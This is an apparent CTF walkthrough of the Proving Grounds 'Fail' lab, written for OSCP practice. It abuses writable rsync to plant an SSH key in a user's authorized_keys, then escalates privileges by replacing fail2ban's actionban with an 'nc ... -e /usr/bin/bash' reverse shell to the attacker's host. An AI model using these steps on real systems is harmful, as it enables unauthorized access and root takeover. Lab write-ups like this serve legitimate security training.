Proving grounds:Fail

Today we will take a look at Proving grounds: Fail. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open rsync (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

rsync (873)

873 - Pentesting Rsyncrsync is a utility for efficiently between a computer and an external hard drive and across by comparing the and sizes…
book.hacktricks.xyz

└─# rsync -rdt rsync://192.168.250.126
fox fox home

#Now lets try to enumerate “fox”

─# nc -nv 192.168.250.126 873
(UNKNOWN) [192.168.250.126] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
fox
@RSYNCD: OK
exit

fox (ssh)

└─# mkdir rsync-share└─# cd rsync-share└─# rsync -av fox@192.168.250.126::fox/ .
receiving incremental file list
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profile└─# mkdir .ssh└─# ssh-keygen -t rsa -N '' -f /root/.ssh/id_rsa
Generating public/private rsa key pair.
Created directory '/root/.ssh'.
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:kWwevUNAVqc1ZGmxzuHcDRmFxDQBJjO5Xccoowazrcg root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .+.=oXB**.|
|       oo+.X=o=+o|
|        *=+=o+o. |
|       o.+=*.o o |
|     . .Soo = . .|
|      E .  .     |
|                 |
|                 |
|                 |
+----[SHA256]-----+└─# cp ~/.ssh/id_rsa.pub  .ssh/authorized_keys┌──(root㉿kali)-[~/ctf/rsync-share]
└─# ls -la .ssh 
total 12
drwxr-xr-x 2 root root 4096 Oct 30 07:24 .
drwxr-xr-x 3 kali 1001 4096 Oct 30 07:23 ..
-rw-r--r-- 1 root root  563 Oct 30 07:24 authorized_keys┌──(root㉿kali)-[~/ctf]
└─# rsync -avp rsync-share/ fox@192.168.250.126::fox/
sending incremental file list
./
.ssh/
.ssh/authorized_keyssent 846 bytes  received 46 bytes  356.80 bytes/sec

└─# ssh -i /root/.ssh/id_rsa fox@192.168.250.126Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
fox

Privesc (fail2ban)

Linpeas.sh

Privilege Escalation With fail2ban - HackMDPrivilege Escalation With **fail2ban** ### What is Fail2Ban? Fail2ban is an intrusion prevention
hackmd.io

pspy64

Enter wrong a few times.

fox@fail:/etc/fail2ban/action.d$ cat iptables-multiport.confactionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>Add the malicious codefox@fail:/etc/fail2ban/action.d$ cat iptables-multiport.confactionban = nc 192.168.49.250 4242 -e /usr/bin/bashListen┌──(root㉿kali)-[~/ctf]
└─# nc -nvlp 4242

Enter wrong a few times.